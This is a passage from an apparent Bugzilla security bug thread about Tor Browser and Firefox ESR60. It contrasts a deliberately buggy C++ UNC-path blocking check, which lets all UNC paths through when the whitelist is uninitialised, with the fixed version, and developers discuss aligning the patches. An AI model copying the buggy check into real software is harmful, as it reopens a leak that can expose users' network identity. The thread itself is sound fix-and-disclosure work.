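  for (const std::string& prefix : PathWhitelist()) {
    if (aPath.compare(0, prefix.size(), prefix) == 0) {
      return true;
    }
  }
  return false;
}

// Buggy shape: the early !sWhitelist return means that if nothing ever
// triggered PathWhitelist(), every UNC path is allowed through.
static bool IsBlockedUNCPathBuggy(const std::string& aPath) {
  if (!sBlockUNCPaths || !sWhitelist) {
    return false;
  }
  return aPath.rfind("\\\\", 0) == 0 && !IsWhitelisted(aPath);
}

// Fixed shape: drop the null check and always go through the getter,
// so an empty (or not-yet-created) whitelist blocks all UNC paths.
static bool IsBlockedUNCPathFixed(const std::string& aPath) {
  if (!sBlockUNCPaths) {
    return false;
  }
  return aPath.rfind("\\\\", 0) == 0 && !IsWhitelisted(aPath);
}
```

The order of calls matters when demonstrating the bug: the buggy check must run before anything else has touched PathWhitelist(), since the first call to the getter creates the (empty) list and masks the problem.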
(In reply to Honza Bambas (:mayhemer) from comment #124)
> Valentin, there seems to be some kind of discrepancy between our code base
> and the tore code base on ESR60 (IIUC).

I think that's because Tor landed the patch from before comment 89 (attachment 8986596 [details] [diff] [review]) and the ESR patch landed a bit later, with a few nits addressed.

The version in m-c actually does not contain the sWhitelist check, since the leak didn't happen on Windows, so I assume we should probably update Tor and ESR.

(In reply to Richard Pospesel (Tor Browser Dev) from comment #125)
> The !sWhitelist check should be removed, since the underlying pointer is
> never accessed directly, and always through the PathWhitelist()
> getter/initializer.

I agree. I'll file a separate bug for it.
Flags: needinfo?(valentin.gosu)
Depends on: 1483377
Whiteboard: [tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage] → [tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage][adv-main62+][adv-esr60.2+]
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.